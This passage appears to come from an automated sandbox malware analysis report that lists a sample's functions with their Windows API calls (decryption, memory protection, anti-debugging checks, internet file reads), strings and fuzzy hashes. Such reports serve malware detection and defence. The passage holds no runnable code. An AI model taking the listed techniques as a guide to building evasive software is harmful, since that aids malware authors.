                        • Instruction Fuzzy Hash: DF819F71A00218AFEF209F25CC45B9ABBB9FF49300F1481BAF50DA7291DB359E858F55
                        Function 04933837 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 225encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 049338B7
                        • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 049338DB
                        • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04933945
                        • GetLastError.KERNEL32 ref: 0493394F
                        • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04933977
                        • GetLastError.KERNEL32 ref: 04933981
                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04933991
                        • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04933A53
                        • CryptDestroyKey.ADVAPI32(?), ref: 04933AC5
                        Strings
                        • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04933893
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                        • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                        • API String ID: 3761881897-63410773
                        • Opcode ID: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                        • Instruction ID: 64749f5dde0b280740c28bad1e501933a405dc80fbb39ba08c07b8f54b26fae4
                        • Opcode Fuzzy Hash: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                        • Instruction Fuzzy Hash: D8816171A402189FEB248F24CC45B9ABBB5EF46301F1481B9E94DE7291DB31AE858F51
                        Function 00402A50 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113memorywindowCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
                        • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
                        • LocalFree.KERNEL32(00000000), ref: 00402B62
                        • LocalFree.KERNEL32(?), ref: 00402B67
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                        • String ID: %s: %s$Error protecting memory page
                        • API String ID: 839691724-1484484497
                        • Opcode ID: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                        • Instruction ID: 7115b4f99f47229cfead79ad45df677009e1c347b6b4b41756aa32ea0cb5f428
                        • Opcode Fuzzy Hash: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                        • Instruction Fuzzy Hash: A0311431B00104AFDB10DF58DD45FAAB7A8EF48704F4541BAE905EB2D2DB79AD06CB98
                        Function 005D75CC Relevance: 11.6, Strings: 8, Instructions: 1643COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: "LO)$ATM|$E6{_$Qs$UUw7$W?w$Xi}$Xi}
                        • API String ID: 0-2014852691
                        • Opcode ID: 606bd147882e54104b73cfb43b0cb9151f1654505aa886a73b9bff79d20f98af
                        • Instruction ID: bb6fb9dce084f6a7ce690b0f8c8fdaa849438b6a4a746eacc543a229fc630fe5
                        • Opcode Fuzzy Hash: 606bd147882e54104b73cfb43b0cb9151f1654505aa886a73b9bff79d20f98af
                        • Instruction Fuzzy Hash: C1B239F360C204AFE708AE2DEC8577ABBE9EBD4720F16853DE6C5C3744E93558048692
                        Function 005D5A16 Relevance: 11.6, Strings: 8, Instructions: 1638COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: +K]~$C~k$m>O$p+V$a\$k|$}6D$P+
                        • API String ID: 0-31495350
                        • Opcode ID: 9560f5c41a5fb5572cde3fd18992100a678fbf75f3ababf9e62acc39bdee81cb
                        • Instruction ID: 1c0a60fdaab4682f78440209a925ac6feedfb018a67b0d39320fbbf7bdfcca94
                        • Opcode Fuzzy Hash: 9560f5c41a5fb5572cde3fd18992100a678fbf75f3ababf9e62acc39bdee81cb
                        • Instruction Fuzzy Hash: 39B236F360C304AFE3086E2DEC8567ABBE5EF94320F164A3DE6C587744EA3558058697
                        Function 0041A346 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                        • Instruction ID: 4ec5cfcd79f9b81e0d104b8321146cba3f0ab1dc6500a030f703b9c7425dc3b2
                        • Opcode Fuzzy Hash: 55dd87499faf8fcf66fe19d6c791e996a87d6224a05bf9275e3249bc6ed21a11
                        • Instruction Fuzzy Hash: E8D21671E092288FDB65CE28DD807EAB7B5EB44305F1441EAD80DE7240E778AEC58F85
                        Function 005D90DF Relevance: 9.1, Strings: 6, Instructions: 1622COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: $]s+$S4}r$[Guo$`1$u.m&$Nv
                        • API String ID: 0-1713350812
                        • Opcode ID: d0773de0aa37aa04a1b4035f20dba081b38f75a7d381943343b94da7493f7f84
                        • Instruction ID: dae5a869833e1d54435c49511bdaa7a8e0b91e102b32a35147ae1a9eb856f1c1
                        • Opcode Fuzzy Hash: d0773de0aa37aa04a1b4035f20dba081b38f75a7d381943343b94da7493f7f84
                        • Instruction Fuzzy Hash: 24B2F5F350C2049FE304AF2DEC8567ABBE9EB94320F1A4A3DEAC5C7344E63558458697
                        Function 00401970 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 293networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 00401A05
                        • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 00401A28
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileInternet$PointerRead
                        • String ID: text
                        • API String ID: 3197321146-999008199
                        • Opcode ID: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                        • Instruction ID: 56e9ac6e571947bcf275884445d614b5348a2aaf1a2f7cc802118cd3fea156c2
                        • Opcode Fuzzy Hash: 0d5891a278ce307004780994f853f58be742df4ecfdd0caad83694c416481f12
                        • Instruction Fuzzy Hash: 10C13970A002189FDB24DF54CC85BE9B7B5EF49304F1041EAE409B72A1DB78AE95CF99
                        Function 005DE148 Relevance: 6.6, Strings: 4, Instructions: 1648COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: l[/$'$v$;q-{$Q#O?
                        • API String ID: 0-486151937
                        • Opcode ID: 31ad21b88c0ab22a5e0845096ff184edd8543a8813f7e38b0ccd9b3fb9a499b2
                        • Instruction ID: 0e425e4e52536ef229c58ef2490f95bc7a511e814ee1a8bb8ee0cfd16b0a4b9b
                        • Opcode Fuzzy Hash: 31ad21b88c0ab22a5e0845096ff184edd8543a8813f7e38b0ccd9b3fb9a499b2
                        • Instruction Fuzzy Hash: 41B24BF3A0C2009FE3046E2DEC8567ABBEAEFD4360F1A463DE6C5D7744E53598018696
                        Function 00410940 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                        • Instruction ID: 78ffdd1b1e8fbf681df67024148688f8aa54f57810aac3ba8850cddb3c6bfb2a
                        • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                        • Instruction Fuzzy Hash: 87024D71E002199BDF14CFA9D9806EEBBB1FF48314F24826AE519E7340D775A981CB94
                        Function 04940BA7 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                        • Instruction ID: fa956fdae317020ac19a581a41398d9c45e8d0b1ac734fa4acbe81453ab37588
                        • Opcode Fuzzy Hash: 3970a8edb598ee4cdd642c6aadd71a51f2b27cb13145b691a5b3c246aa97f6e8
                        • Instruction Fuzzy Hash: 86022C71E012199FDB14CFA9C984AAEBBF5FF88314F148279D919EB340D731AA45CB90
                        Function 005D0CCC Relevance: 6.3, Strings: 4, Instructions: 1268COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: ^}$$9~~$25?/$?z
                        • API String ID: 0-1240198085
                        • Opcode ID: 39a499ca68058ddf75fc25e59e5051402cce5db84003baafd0abb829e57a4a18
                        • Instruction ID: e67cf6333455532aeddfc1bedc058cd6f6c6ce2a69e8c6dfeae7268e3419ffbe
                        • Opcode Fuzzy Hash: 39a499ca68058ddf75fc25e59e5051402cce5db84003baafd0abb829e57a4a18
                        • Instruction Fuzzy Hash: DC824BF360C2149FE3006E2DEC85A7AFBDAEFD4660F1A853EE6C4C7744E93558058692
                        Function 0040A58A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                        Download Yara Rule
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0040A596
                        • IsDebuggerPresent.KERNEL32 ref: 0040A662
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040A682
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0040A68C
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                        • String ID:
                        • API String ID: 254469556-0
                        • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                        • Instruction ID: e2fd69841e347503e8527ce1becac27b78df2bbd7224e42b4cf7edbda655d181
                        • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                        • Instruction Fuzzy Hash: 04313A75D4131CDBDB10DFA5D989BCDBBB8BF08304F1080AAE408A7290EB759E858F49
                        Function 0493A7F1 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                        Download Yara Rule
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017,00181B20), ref: 0493A7FD
                        • IsDebuggerPresent.KERNEL32 ref: 0493A8C9
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0493A8E9
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0493A8F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                        • String ID:
                        • API String ID: 254469556-0
                        • Opcode ID: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                        • Instruction ID: 62919bc36b84fda0e749d36c632da5e993357a99352e646dcfd1ad18ea196035
                        • Opcode Fuzzy Hash: b44e0052ca5400530e688fbbb916524e737d0e21bc499905028a740eb104beb1
                        • Instruction Fuzzy Hash: 7731F975D0521CDBDB10DFA4D989BCCBBB8BF08305F1041AAE54DAB250EB71AA85CF45
                        Function 005E4B77 Relevance: 5.3, Strings: 3, Instructions: 1574COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: ;u]$LMS>$`[hs
                        • API String ID: 0-435302392
                        • Opcode ID: d724e1db776e51f8459d57f05f6713a4f86f69cb9bc4f8627e741429882b1794
                        • Instruction ID: d86f2f790d2502fa30ab78c2cef223632180a4632b353ab369c73e677abee72f
                        • Opcode Fuzzy Hash: d724e1db776e51f8459d57f05f6713a4f86f69cb9bc4f8627e741429882b1794
                        • Instruction Fuzzy Hash: E5B2D5F3A0C2049FE3046E2DEC8567AFBE9EF94720F16493DE6C4C7744EA3598418696
                        Function 005CEDE7 Relevance: 5.3, Strings: 3, Instructions: 1521COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: 1rv_$DNgO${%T~
                        • API String ID: 0-2343050665
                        • Opcode ID: 185322069164638d14650a2d7df239bf48d108ede5c2a4905127fbc7c391ce86
                        • Instruction ID: 8440ba951f84abcb6bfd3af52fa87251e3781c1c42ca46fa42a6d8270dec377f
                        • Opcode Fuzzy Hash: 185322069164638d14650a2d7df239bf48d108ede5c2a4905127fbc7c391ce86
                        • Instruction Fuzzy Hash: 40A215F360C204AFE3046E2DEC8567AFBE5EF94720F1A493DEAC587744EA3558018697
                        Function 005DCFCC Relevance: 4.7, Strings: 3, Instructions: 906COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: a|{?$pq;[$w W
                        • API String ID: 0-3988622055
                        • Opcode ID: d7470877e0e76858b03681f25e4da93e8f27231e4cd9f11313eca4db34a1626c
                        • Instruction ID: e9d40dfd9a7116305c20cf60e706afea5c2e4606634e6c813d8c2ecad833bd6a
                        • Opcode Fuzzy Hash: d7470877e0e76858b03681f25e4da93e8f27231e4cd9f11313eca4db34a1626c
                        • Instruction Fuzzy Hash: BE4229F36082149FE3046E2DEC8567AFBE9EF94720F1A453EEAC4C7340E97598058696
                        Function 0040CDE3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0040CEDB
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040CEE5
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0040CEF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                        • Instruction ID: c8210cab332152a7f303cacbc0cae8b9100ca1fc91568f2564f16f954c9570b7
                        • Opcode Fuzzy Hash: e436a8829045c153a86cd1f8a8b118e982bc3228d08815e2757f6e40e94fe856
                        • Instruction Fuzzy Hash: 3331D574941218EBCB21DF65D8897CDBBB4BF08314F5082EAE81CA7291E7749F858F49
                        Function 0493D04A Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,04932AA0), ref: 0493D142
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,04932AA0), ref: 0493D14C
                        • UnhandledExceptionFilter.KERNEL32(0493277A,?,?,?,?,?,04932AA0), ref: 0493D159
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                        • Instruction ID: 34ded91ae66ba47a41276a88eca504d48e69a35d7258192db0b25e70c6f93b44
                        • Opcode Fuzzy Hash: eab9de89e4f223b0e8801f8ff3c4edb53ba30b9f948264c96fa02635900acdf3
                        • Instruction Fuzzy Hash: 6F31D8749112289BCB21DF64DC89BCCBBB8BF48315F5041EAE40CA7260E770AF858F44
                        Function 005DFBE3 Relevance: 4.1, Strings: 2, Instructions: 1578COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: 1"lU$m]Ox
                        • API String ID: 0-3289623548
                        • Opcode ID: 6155e624c5b084394bd27a016f6c9e02836d90db60e16eaaa9e92df87385a8ab
                        • Instruction ID: a2e2954c1da0abe985a1044130f123857017852bd46b2f4eab8ebedd4f1a02c2
                        • Opcode Fuzzy Hash: 6155e624c5b084394bd27a016f6c9e02836d90db60e16eaaa9e92df87385a8ab
                        • Instruction Fuzzy Hash: B4B2F6F360C200AFE304AE2DEC4567AF7E9EF94720F16892DE6C5C3744EA3598458697
                        Function 0493092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: .$GetProcAddress.$l
                        • API String ID: 0-2784972518
                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                        • Instruction ID: 6b9b36a192e3e9ea31a7229c7929fc2729a9d8dbe7cfa250a2b719c887260d90
                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                        • Instruction Fuzzy Hash: 38316CB6900609DFEB10CF99C880AAEBBF9FF49329F14405AD541AB314D771FA45CBA4
                        Function 005E1C5A Relevance: 3.6, Strings: 2, Instructions: 1117COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: 3/W$f|=
                        • API String ID: 0-3293423881
                        • Opcode ID: e719218062571db7189fe2f618259ddad816d4651695f0c4742ea4f7a301a673
                        • Instruction ID: 5b6326a9bd7d02d22e9a9d8912c61077a58df046f69f4183a4525eb3e4986dce
                        • Opcode Fuzzy Hash: e719218062571db7189fe2f618259ddad816d4651695f0c4742ea4f7a301a673
                        • Instruction Fuzzy Hash: 9F72D7F3A082009FE304AE2DDC4576AF7EAEFD4720F1A893DE6C4D7744E63598058696
                        Function 00410822 Relevance: 3.0, APIs: 2, Instructions: 44timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,8F925C9F), ref: 00410837
                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                        • String ID:
                        • API String ID: 1518329722-0
                        • Opcode ID: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                        • Instruction ID: 1c50189d93918816d196ec70bd43d3640a511bc00310eef3747ee1678f9f3f9c
                        • Opcode Fuzzy Hash: e180163b605ce24ec50b538605d54e7015c692564284d471828b5f4d87c2059b
                        • Instruction Fuzzy Hash: 09F0F9B1E002147B8724AF6EC8049DFBEE9EEC5770725465AE809D3340D5B4CD8182D4
                        Function 00520B8C Relevance: 2.7, Strings: 2, Instructions: 163COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: V[$e-^o
                        • API String ID: 0-399160139
                        • Opcode ID: f80bc837f5cf1e86fbc6a2c2d4cb8e605d68a4e09353f28af1213833bebb2982
                        • Instruction ID: 100894d1b743f99ad40275f00bbca0588ff4c32b3e1e2f5f342a9bd6ccd1f438
                        • Opcode Fuzzy Hash: f80bc837f5cf1e86fbc6a2c2d4cb8e605d68a4e09353f28af1213833bebb2982
                        • Instruction Fuzzy Hash: 634149F3E042284BF308A93EDD98377BA86DB80750F1B823DDB8597BC4E87D59054295
                        Function 005DB875 Relevance: 1.9, Strings: 1, Instructions: 652COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514188391.0000000000470000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_470000_file.jbxd
                        Similarity
                        • API ID:
                        • String ID: Sc
                        • API String ID: 0-3933943610
                        • Opcode ID: ccdec714957d094498e67adc2564fcd0d6def5a20aabb558cc76e55e184e30e3
                        • Instruction ID: b3f39aab87ec66ac607758d1bda7760b1467beadc809b28dc988eadddf18fab7
                        • Opcode Fuzzy Hash: ccdec714957d094498e67adc2564fcd0d6def5a20aabb558cc76e55e184e30e3
                        • Instruction Fuzzy Hash: 411269F3A082149FE3046E2DEC4577ABBE9EF94720F1A863DEAC4C7740F57598058686
                        Function 0041572E Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00415729,?,?,00000008,?,?,0041C68A,00000000), ref: 0041595B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                        • Instruction ID: 6715a78ad53a010e1f654acf6738d2326510568a7b3af97ced4f43bd22a978ec
                        • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                        • Instruction Fuzzy Hash: 02B17E71520A08DFD714CF28C486BE57BE0FF85364F298659E899CF2A1C339D992CB45
                        Function 04945995 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04945990,?,?,00000008,?,?,0494C8F1,00000000), ref: 04945BC2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                        • Instruction ID: 465a892a4f4d3f42855d86089aadac46603aef8161539a223c1ae585d88c4d3f
                        • Opcode Fuzzy Hash: e03884c1b799fb46ae45e907d4085e80ad0ec7257463db2e47aeebe4ac254d4e
                        • Instruction Fuzzy Hash: 7FB13E31610608EFD715CF68C48AF657BE1FF85365F2A8668E999CF2A1C335E981CB40
                        Function 0040A2EC Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                        Download Yara Rule
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040A302
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FeaturePresentProcessor
                        • String ID:
                        • API String ID: 2325560087-0
                        • Opcode ID: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                        • Instruction ID: 655f466d2002f1984def2d585099db1cc9528c498776e59a8b59a497753dfce5
                        • Opcode Fuzzy Hash: 0087427e5fec96f3a69268fd39bcd2ddcdf30d7205d75486cccbac6015e6632e
                        • Instruction Fuzzy Hash: 4C5136B1E10315CFDB24CF95D8857AABBF0FB48314F24803AD905EB3A1D37899568B99
                        Function 00417727 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1f1184e7a09d65eff5b8ffcd4e3bf1005a55978abbf3cbcf98c0185f47ed9858
                        • Instruction ID: 0da0f6d43ac66bea4d05f4cd5f3fcaee254ac53de518b98f89be5a9909b1102a
